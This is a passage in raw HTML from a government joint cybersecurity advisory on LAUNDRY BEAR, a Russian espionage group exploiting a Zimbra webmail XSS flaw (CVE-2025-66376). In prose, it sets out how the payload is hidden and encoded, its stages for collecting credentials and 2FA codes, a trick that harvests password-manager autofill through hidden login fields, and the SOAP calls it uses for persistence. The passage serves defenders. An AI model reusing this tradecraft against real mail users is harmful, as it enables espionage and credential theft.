&lt;li&gt;Estonian Foreign Intelligence Service (EFIS)&lt;a href=&quot;#f3&quot;&gt;&lt;sup&gt;3&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Finnish Defence Intelligence (FDI)&lt;a href=&quot;#f4&quot;&gt;&lt;sup&gt;4&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Finnish Security and Intelligence Service (SUPO)&lt;a href=&quot;#f5&quot;&gt;&lt;sup&gt;5&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;French General Directorate for Internal Security (DGSI)&lt;a href=&quot;#f6&quot;&gt;&lt;sup&gt;6&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;French National Cybersecurity Agency (ANSSI)&lt;a href=&quot;#f7&quot;&gt;&lt;sup&gt;7&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Italian External Intelligence and Security Agency (AISE)&lt;a href=&quot;#f8&quot;&gt;&lt;sup&gt;8&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Italian Internal Intelligence and Security Agency (AISI)&lt;a href=&quot;#f9&quot;&gt;&lt;sup&gt;9&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Security and Intelligence Service of the Republic of Moldova (SIS RM)&lt;a href=&quot;#f10&quot;&gt;&lt;sup&gt;10&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Polish Foreign Intelligence Agency (AW)&lt;a href=&quot;#f11&quot;&gt;&lt;sup&gt;11&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;The Military Counterintelligence Service of Poland (SKW)&lt;a href=&quot;#f12&quot;&gt;&lt;sup&gt;12&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Spain National Intelligence Centre (CNI)&lt;a href=&quot;#f13&quot;&gt;&lt;sup&gt;13&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Sweden National Cyber Security Centre (NCSC-SE)&lt;a href=&quot;#f14&quot;&gt;&lt;sup&gt;14&lt;/sup&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The authoring agencies urge any organizations using ZCS to implement the recommendations listed within the &lt;a href=&quot;#mitigations1&quot;&gt;Mitigations&lt;/a&gt; section of this advisory to reduce the risk associated with this activity. This CSA also includes specific remediations for organizations to implement if they discover the presence of the listed &lt;a href=&quot;#ioc1&quot;&gt;Indicators of compromise&lt;/a&gt; (IOCs). &amp;nbsp;&lt;/p&gt;
&lt;p&gt;As more organizations update their ZCS software based on this CSA, LAUNDRY BEAR may discontinue the current campaign exploiting this vulnerability; however, based on the success of this and previous campaigns, it is very likely that the group will continue to target ZCS and other email systems used by organizations in Western countries. The actors will almost certainly continue to rely on email to engage potential victims by exploiting novel vulnerabilities and, when necessary, use social engineering techniques to assist with their efforts. The authoring agencies recommend organizations regularly update their mail service software and continuously monitor their email systems and emails for malicious activity.&lt;/p&gt;
&lt;p&gt;For a downloadable list of IOCs, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.xml&quot;&gt;AA26-204A.stix.xml&lt;/a&gt; (STIX XML)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-204A.stix_.json&quot;&gt;AA26-204A.stix.json&lt;/a&gt; (STIX JSON)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Cybersecurity industry tracking&lt;/strong&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;cyber1&quot;&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;The cybersecurity industry provides overlapping cyber threat intelligence, indicators of compromise (IOCs), and mitigation recommendations related to these Russian state-supported cyber actors. While not exhaustive, the following are threat group names commonly used for these actors within the cybersecurity community:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;LAUNDRY BEAR&lt;/li&gt;
&lt;li&gt;Void Blizzard [&lt;a href=&quot;#wc2&quot;&gt;2&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;CL-STA-1114 [&lt;a href=&quot;#wc3&quot;&gt;3&lt;/a&gt;]&lt;/li&gt;
&lt;li&gt;TA488 (formerly UNK_PitStop) [&lt;a href=&quot;#wc4&quot;&gt;4&lt;/a&gt;]&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. government’s understanding for all activity related to these groupings.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Background&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;Public advisories from Netherlands General Intelligence and Security Service (AIVD), Netherlands Defence Intelligence and Security Service (MIVD), and Microsoft highlighted these Russian state-supported advanced persistent threat (APT) actors in May 2025, calling them LAUNDRY BEAR and Void Blizzard respectively [&lt;a href=&quot;#wc1&quot;&gt;1&lt;/a&gt;] [&lt;a href=&quot;#wc2&quot;&gt;2&lt;/a&gt;]. Both advisories assessed that the group was engaged in malicious cyber activity as early as April 2024. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;The May 2025 advisories highlighted a cluster of activity targeting cloud-based email environments, including Microsoft Exchange in particular, and abusing legitimate APIs to perform data exfiltration in bulk [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/002/&quot; target=&quot;_blank&quot;&gt;T1114.002&lt;/a&gt;]. The group relied on unsophisticated means of initial access, including procuring stolen credentials on criminal marketplaces [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1078/&quot; target=&quot;_blank&quot;&gt;T1078&lt;/a&gt;], and using social engineering techniques to lure targets into interacting with a malicious site masquerading as a legitimate one. As of April 2025, one of these sites resembled a European Defence &amp;amp; Security Summit registration portal that required registrants to sign in to their Microsoft account to view. Once a user entered their Microsoft credentials into this malicious site, LAUNDRY BEAR’s modified version of the open source adversary emulation toolkit, Evilginx, intercepted the user’s credentials. LAUNDRY BEAR then used this authentication data, including passwords and session tokens, to access the compromised account and conduct mass email exfiltration, as well as harvest other information. This method of compromise is commonly known as an adversary-in-the-middle (AiTM) technique [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1557/&quot; target=&quot;_blank&quot;&gt;T1557&lt;/a&gt;]. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;Beginning around July 2025, LAUNDRY BEAR shifted toward a more technical method of email compromise, highlighting their continued efforts to covertly acquire email communications from a variety of Western organizations of interest and deliver them to the Russian Federation. Using a custom-developed capability [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/001/&quot; target=&quot;_blank&quot;&gt;T1587.001&lt;/a&gt;] named “&lt;em&gt;Улей&lt;/em&gt;” or “&lt;em&gt;Ulej&lt;/em&gt;” (Russian for beehive), LAUNDRY BEAR successfully targeted and exfiltrated sensitive user information from organizations who use the Zimbra Collaboration Suite (ZCS) product [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1114/&quot; target=&quot;_blank&quot;&gt;T1114&lt;/a&gt;]. Data LAUNDRY BEAR attempted to exfiltrate from compromised accounts included:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Last 90 days of emails,&lt;/li&gt;
&lt;li&gt;Email address,&lt;/li&gt;
&lt;li&gt;Password [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/001/&quot; target=&quot;_blank&quot;&gt;T1589.001&lt;/a&gt;],&lt;/li&gt;
&lt;li&gt;Global Address List (GAL) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1087/&quot; target=&quot;_blank&quot;&gt;T1087&lt;/a&gt;],&lt;/li&gt;
&lt;li&gt;Two-factor authentication (2FA) tokens, and&lt;/li&gt;
&lt;li&gt;Newly-created Application Passcode [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1098/&quot; target=&quot;_blank&quot;&gt;T1098&lt;/a&gt;].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The covert and persistent nature of this activity, along with the absence of any known financial extortion, almost certainly indicates this group’s involvement in espionage activities with Russian government backing. Additionally, extensive Ukrainian targeting, prior to use against U.S. and other NATO allies, outlines an increasing trend within Russian cyber threat groups to target Ukrainian users first—both as a priority target and as a testbench for malicious cyber techniques before broader global deployment.&lt;/p&gt;
&lt;h2&gt;&lt;strong&gt;Targeting details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;LAUNDRY BEAR has targeted and compromised users in various organizations, including those associated with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;the Defense Industrial Base (DIB), &amp;nbsp;&lt;/li&gt;
&lt;li&gt;the federal and local government,&lt;/li&gt;
&lt;li&gt;education,&lt;/li&gt;
&lt;li&gt;energy,&lt;/li&gt;
&lt;li&gt;law enforcement, &amp;nbsp;&lt;/li&gt;
&lt;li&gt;media, &amp;nbsp;&lt;/li&gt;
&lt;li&gt;non-governmental organizations, and&lt;/li&gt;
&lt;li&gt;technology.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Technical details&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; This advisory uses the &lt;a href=&quot;https://attack.mitre.org/versions/v19/matrices/enterprise/&quot; target=&quot;_blank&quot;&gt;MITRE ATT&amp;amp;CK® Matrix for Enterprise&lt;/a&gt; framework, version 19. This advisory also uses &lt;a href=&quot;https://d3fend.mitre.org/&quot; target=&quot;_blank&quot;&gt;MITRE D3FEND&lt;sup&gt;TM&lt;/sup&gt;&lt;/a&gt; version 1.4.0&lt;a href=&quot;#f15&quot;&gt;&lt;sup&gt;15&lt;/sup&gt;&lt;/a&gt;. See &lt;a href=&quot;#appendixa&quot;&gt;Appendix A&lt;/a&gt; and &lt;a href=&quot;#appendixb&quot;&gt;Appendix B&lt;/a&gt; for tables of the activity mapped to MITRE ATT&amp;amp;CK and D3FEND tactics, techniques, and countermeasures.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Ulej &lt;/em&gt;is a novel data exfiltration and aggregation capability, that currently (as of the publication of this report) supports a campaign specifically targeting users of ZCS webmail servers. This capability is used to exploit &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt; [Common Weakness Enumeration (CWE) &lt;a href=&quot;https://cwe.mitre.org/data/definitions/79.html&quot; target=&quot;_blank&quot;&gt;CWE-79: Improper Neutralization of Input During Web Page Generation (&#039;Cross-site Scripting&#039;&lt;/a&gt;)], but likely could be adapted to exploit other vulnerabilities. It exfiltrates emails and other sensitive user data from a victim’s system immediately after exploitation and stores the data in an actor-controlled unattributable virtual private server (VPS) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1074/002/&quot; target=&quot;_blank&quot;&gt;T1074.002&lt;/a&gt;] running LAUNDRY BEAR’s “Flowerbed” collection framework. The collected data is almost certainly further exfiltrated to internal network resources for review and long-term retention.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Reconnaissance&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;LAUNDRY BEAR uses the &lt;em&gt;Ulej &lt;/em&gt;capability to exploit the &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt; vulnerability in organizations using ZCS. This campaign’s targeted victimology and limited exploitation capabilities likely indicate this group manually identifies and targets the victim organizations. LAUNDRY BEAR likely identifies organizations with public-facing Zimbra infrastructure by port scanning [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1595/&quot; target=&quot;_blank&quot;&gt;T1595&lt;/a&gt;] and fingerprinting datasets easily procured through various commercial vendors [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1596/005/&quot; target=&quot;_blank&quot;&gt;T1596.005&lt;/a&gt;]. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;After identifying a target organization, the group likely compiles email addresses for individual users to target with the exploit [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1589/002/&quot; target=&quot;_blank&quot;&gt;T1589.002&lt;/a&gt;] from datasets offered by commercial vendors [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1597/002/&quot; target=&quot;_blank&quot;&gt;T1597.002&lt;/a&gt;], open source intelligence [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1593/&quot; target=&quot;_blank&quot;&gt;T1593&lt;/a&gt;], or previously exfiltrated data [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1597/&quot; target=&quot;_blank&quot;&gt;T1597&lt;/a&gt;]. &amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Resource development &lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;resourcedev1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The actors procure VPSs from a variety of providers [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/003/&quot; target=&quot;_blank&quot;&gt;T1583.003&lt;/a&gt;], including those with Know Your Customer (KYC) requirements, and often use fabricated identities. LAUNDRY BEAR primarily uses Mullvad VPN [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1583/&quot;&gt;T1583&lt;/a&gt;] when interacting with these servers, further demonstrating the group’s intent to mask their identity and maintain operations security (OPSEC). After the server is provisioned, an automated process deploys the Docker containers necessary for &lt;em&gt;Ulej’s&lt;/em&gt; Flowerbed framework [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1608/&quot;&gt;T1608&lt;/a&gt;], which then receives and aggregates the data &lt;em&gt;Ulej&lt;/em&gt; exfiltrates. These servers are typically only used for 7-60 days before moving to new infrastructure.&lt;/p&gt;
&lt;h4&gt;&lt;strong&gt;Flowerbed framework&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Flowerbed is a Python project that uses Docker for containerization. The project includes four different Docker containers:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Catcher,&lt;/li&gt;
&lt;li&gt;Certbot,&lt;/li&gt;
&lt;li&gt;Nginx, and&lt;/li&gt;
&lt;li&gt;Gardener.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Catcher acts as both a DNS and HTTP server to receive and aggregate exfiltrated victim information [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/&quot;&gt;T1048&lt;/a&gt;]. For additional information on Catcher, refer to the &lt;a href=&quot;#exfil1&quot;&gt;Exfiltration&lt;/a&gt; section of this advisory. Flowerbed’s next container, Certbot, is based on one of the official Certbot containers, which allows for automated generation of Let’s Encrypt certificates using DNS challenges through Cloudflare. This certificate can then be used by the Nginx container, which serves as an HTTPS reverse proxy for Catcher, enabling Flowerbed to disguise some of its exfiltration activity through an encrypted communications channel [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1048/002/&quot; target=&quot;_blank&quot;&gt;T1048.002&lt;/a&gt;]. The Nginx reverse proxy also validates that the Server Name Indicator (SNI) value contains “*.i.*” prior to forwarding the traffic to Catcher. If the SNI does not contain that string, the Nginx server returns a 444 error to the client. This is likely an attempt to reject non-Ulej connections. Finally, the Gardener container functions as a health check for the Catcher service. Gardener is a simple Python script that validates Catcher correctly receives and processes data.&lt;/p&gt;
&lt;p&gt;The simplistic Flowerbed codebase has indications that artificial intelligence (AI) played a role in its development. This highlights how AI is increasingly being used to develop malicious capabilities [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/007/&quot; target=&quot;_blank&quot;&gt;T1588.007&lt;/a&gt;]. The dependence on AI for a simple capability, such as Flowerbed, alongside a previous reliance on open source capabilities, such as Evilginx2 [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1588/002/&quot; target=&quot;_blank&quot;&gt;T1588.002&lt;/a&gt;], likely indicates a lack of advanced technical knowledge within LAUNDRY BEAR, especially in relation to true software development capabilities.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Initial access&lt;/strong&gt;&lt;/em&gt;&lt;/h3&gt;
&lt;p&gt;To gain initial access, LAUNDRY BEAR sends an email containing a malicious JavaScript payload to the target [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1566/&quot; target=&quot;_blank&quot;&gt;T1566&lt;/a&gt;]. Through exploitation of &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt;, this JavaScript payload is immediately executed once the user views the malicious email [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1203/&quot; target=&quot;_blank&quot;&gt;T1203&lt;/a&gt;], such as the one shown in &lt;a href=&quot;#figure1&quot;&gt;&lt;strong&gt;Figure 1&lt;/strong&gt;&lt;/a&gt;, in the ZCS webmail platform. Since at least November 2025, LAUNDRY BEAR began sending these phishing emails from victim infrastructure through compromised accounts [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1199/&quot; target=&quot;_blank&quot;&gt;T1199&lt;/a&gt;], as shown in the email metadata in &lt;a href=&quot;#figure2&quot;&gt;&lt;strong&gt;Figure 2&lt;/strong&gt;&lt;/a&gt;. These compromised accounts were likely previous victims of this, or another LAUNDRY BEAR, campaign and their use is intended to further obfuscate and frustrate anti-phishing tools and training.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure1&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/figure1.png?itok=yrzcl7tK&quot; width=&quot;604&quot; height=&quot;235&quot; alt=&quot;Figure 1: Example of malicious email&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 1: Example of malicious email&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure2&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/figure2.png?itok=vEulmmyx&quot; width=&quot;604&quot; height=&quot;102&quot; alt=&quot;Figure 2: Headers from an example malicious email&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 2: Headers from an example malicious email&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;According to the National Vulnerability Database (NVD), &lt;a href=&quot;https://nvd.nist.gov/vuln/detail/CVE-2025-66376&quot; target=&quot;_blank&quot;&gt;CVE-2025-66376&lt;/a&gt; was initially published on 5 January 2026. This vulnerability allows for execution of a JavaScript payload included in email content due to improper sanitization of Cascading Style Sheet’s (CSS) @import directives within an email [&lt;a href=&quot;#wc5&quot;&gt;5&lt;/a&gt;]. Because the activity attributed to this campaign began in July 2025—months before Synacor released a patch and the CVE was published—the payload initially exploited a zero-day vulnerability at that time [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/004/&quot; target=&quot;_blank&quot;&gt;T1587.004&lt;/a&gt;]. &amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Utilization of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Hidden in LAUNDRY BEAR’s email is a Base64 encoded payload within the “onload” field of a Scalable Vector Graphics (SVG) element [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/017/&quot; target=&quot;_blank&quot;&gt;T1027.017&lt;/a&gt;], as shown in &lt;a href=&quot;#figure3&quot;&gt;&lt;strong&gt;Figure 3&lt;/strong&gt;&lt;/a&gt;. Leading up to the inclusion of this payload in the SVG element are various instances of @import directives, as required to leverage &lt;a href=&quot;https://www.cve.org/CVERecord?id=CVE-2025-66376&quot;&gt;CVE-2025-66376&lt;/a&gt;. This payload includes an XOR encrypted final script encoded in a Base64 inner payload (see &lt;a href=&quot;#figure3&quot;&gt;&lt;strong&gt;Figure 3&lt;/strong&gt;&lt;/a&gt;) [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/013/&quot; target=&quot;_blank&quot;&gt;T1027.013&lt;/a&gt;]. The outer payload decodes and decrypts the inner payload using an XOR function and a hardcoded key and then executes the script contained within the inner payload containing the collection and exfiltration logic. By changing the key used for the XOR encryption of the inner payload or adding additional @import directives with non-functional code [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1027/010/&quot; target=&quot;_blank&quot;&gt;T1027.010&lt;/a&gt;], LAUNDRY BEAR can easily generate new payloads that bypass basic threat detection signatures. This malicious payload attempts to collect and exfiltrate information in 12 asynchronous stages [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1119/&quot;&gt;T1119&lt;/a&gt;]. The stages in order of appearance within the payload are as follows:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;sendStartPing,&lt;/li&gt;
&lt;li&gt;gather_email,&lt;/li&gt;
&lt;li&gt;gather_environment,&lt;/li&gt;
&lt;li&gt;gather_2fa_codes,&lt;/li&gt;
&lt;li&gt;gather_app_password,&lt;/li&gt;
&lt;li&gt;gather_device_status,&lt;/li&gt;
&lt;li&gt;gather_oauth_consumers,&lt;/li&gt;
&lt;li&gt;gather_autocomplete_password,&lt;/li&gt;
&lt;li&gt;enable_mail_protocols,&lt;/li&gt;
&lt;li&gt;gather_gal,&lt;/li&gt;
&lt;li&gt;sendArchives, and&lt;/li&gt;
&lt;li&gt;sendFinishPing.&amp;nbsp;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure3&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/figure3_0.png?itok=M-bj5-nb&quot; width=&quot;607&quot; height=&quot;577&quot; alt=&quot;Figure 3: Malicious payload of example email&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 3: Malicious payload of example email&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;Use of a zero-day exploit within this campaign demonstrates the ability for even emerging threat groups like LAUNDRY BEAR to operationalize novel exploits into a highly successful capability [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1587/&quot; target=&quot;_blank&quot;&gt;T1587&lt;/a&gt;].&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Persistence and credential access&lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;persistence1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;To establish sustained persistence into the victim’s email account, the script attempts to modify account preferences and collect authentication information. Any collected credentials are later exfiltrated, as further described in the &lt;a href=&quot;#exfil1&quot;&gt;Exfiltration&lt;/a&gt; section below. Other campaigns attributed to LAUNDRY BEAR also demonstrated the group’s ability to circumvent multi-factor authentication through session token replay [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1550/004/&quot; target=&quot;_blank&quot;&gt;T1550.004&lt;/a&gt;], and the Zimbra campaign follows a similar trend.&lt;/p&gt;
&lt;p&gt;The script used in this campaign tries to discover the victim’s email address during the &lt;em&gt;gather_email&lt;/em&gt; stage [&lt;a href=&quot;https://attack.mitre.org/techniques/T1087/&quot; target=&quot;_blank&quot;&gt;T1087&lt;/a&gt;]. The script searches for this email address in two ways. First, it examines the &lt;em&gt;batchInfoResponse &lt;/em&gt;variable, which an HTML script element on the webpage can define, for an email address. Even if the script finds an email address there, it also checks whether it acquired a Cross-Site Request Forgery (CSRF) token as described later in the &lt;a href=&quot;#collection1&quot;&gt;Collection&lt;/a&gt; section of this advisory. If so, the script uses the “GetIdentitiesRequest” Simple Object Access Protocol (SOAP) command under the “ZimbraAccount” namespace to determine the victim’s email address [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1185/&quot; target=&quot;_blank&quot;&gt;T1185&lt;/a&gt;] and then exfiltrates it. However, if the script does not have a CSRF token or the SOAP request fails, the script exfiltrates the email value recovered from the first method instead. If both attempts fail to capture the victim’s email, the script sends a JavaScript Object Notation (JSON) payload with a key of “email” and value of &lt;em&gt;null &lt;/em&gt;over HTTPS and does not attempt DNS exfiltration.&lt;/p&gt;
&lt;p&gt;During the &lt;em&gt;gather_autocomplete_password&lt;/em&gt; stage, the script attempts to collect the victim’s saved password via the autocomplete feature of the victim’s password manager. The script injects two HTML div elements requesting login credentials onto the page outside of the victim’s view, as shown in &lt;a href=&quot;#figure4&quot;&gt;&lt;strong&gt;Figure 4&lt;/strong&gt;&lt;/a&gt;&lt;strong&gt; &lt;/strong&gt;and &lt;a href=&quot;#figure5&quot;&gt;&lt;strong&gt;Figure 5&lt;/strong&gt;&lt;/a&gt;. After waiting five seconds, the script then attempts to extract the password provided automatically by the password manager from the input element shown in &lt;a href=&quot;#figure4&quot;&gt;&lt;strong&gt;Figure 4&lt;/strong&gt;&lt;/a&gt;. If there is no value in that input field, it checks the password input field shown in &lt;a href=&quot;#figure5&quot;&gt;&lt;strong&gt;Figure 5&lt;/strong&gt;&lt;/a&gt;. If neither input field contains a value, a JSON payload with a key of “autocomplete_password” and value of &lt;em&gt;null &lt;/em&gt;is sent over HTTPS and DNS exfiltration is not attempted.&lt;/p&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure4&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/figure4.png?itok=ZOZ8JHZC&quot; width=&quot;1024&quot; height=&quot;188&quot; alt=&quot;Figure 4: First illegitimate login HTML element&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 4: First illegitimate login HTML element&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;figure5&quot;&gt;&lt;/a&gt;&lt;/p&gt;



&lt;figure class=&quot;c-figure c-figure--image&quot; role=&quot;group&quot;&gt;
  
  &lt;div class=&quot;c-figure__media&quot;&gt;    &lt;img loading=&quot;lazy&quot; src=&quot;/sites/default/files/styles/large/public/2026-07/figure5.png?itok=8xZU_GCa&quot; width=&quot;1024&quot; height=&quot;115&quot; alt=&quot;Figure 5: Second illegitimate login HTML element&quot;&gt;



&lt;/div&gt;
      &lt;figcaption class=&quot;c-figure__caption&quot;&gt;&lt;em&gt;&lt;strong&gt;Figure 5: Second illegitimate login HTML element&lt;/strong&gt;&lt;/em&gt;&lt;/figcaption&gt;
  &lt;/figure&gt;
&lt;p&gt;LAUNDRY BEAR almost certainly relies on a mail client using the Internet Message Access Protocol (IMAP) for persistent access to the victim’s mailbox. During the &lt;em&gt;enable_mail_protocols&lt;/em&gt; stage, a SOAP request leveraging the “ModifyPrefsRequest” command under the “ZimbraAccount” namespace is sent. This request attempts to set the “zimbraPrefImapEnabled” preference to TRUE. While the default setting for “zimbraPrefImapEnabled” is not well documented, this action is almost certainly intended to ensure that IMAP access to the victim’s mailbox is enabled.&lt;/p&gt;
&lt;p&gt;ZCS does not support 2FA for some mail clients, including IMAP. To support users who rely on IMAP clients, ZCS allows for the generation of Application Passcodes. Application Passcodes are randomly generated passwords that can be used for clients that cannot support the normal 2FA process to authenticate. During the &lt;em&gt;gather_app_password&lt;/em&gt; stage, the script makes a SOAP request using the “CreateAppSpecificPasswordRequest” command under the “ZimbraAccount” namespace to create a new Application Passcode [&lt;a href=&quot;https://attack.mitre.org/versions/v19/techniques/T1556/006/&quot; target=&quot;_blank&quot;&gt;T1556.006&lt;/a&gt;]. The SOAP request uses “ZimbraWeb” as the name of the application.&lt;/p&gt;
&lt;p&gt;Additionally, the script also attempts to collect 2FA tokens. During the &lt;em&gt;gather_2fa_codes&lt;/em&gt; stage, the script makes a SOAP request using the “GetScratchCodesRequest” command under the “ZimbraAccount” namespace. The script then attempts to exfiltrate any non-null 2FA codes collected this way. The number of codes can vary, and each code is exfiltrated to Flowerbed individually.&lt;/p&gt;
&lt;h3&gt;&lt;em&gt;&lt;strong&gt;Collection&lt;/strong&gt;&lt;/em&gt;&lt;a class=&quot;ck-anchor&quot; id=&quot;collection1&quot;&gt;&lt;/a&gt;&lt;/h3&gt;
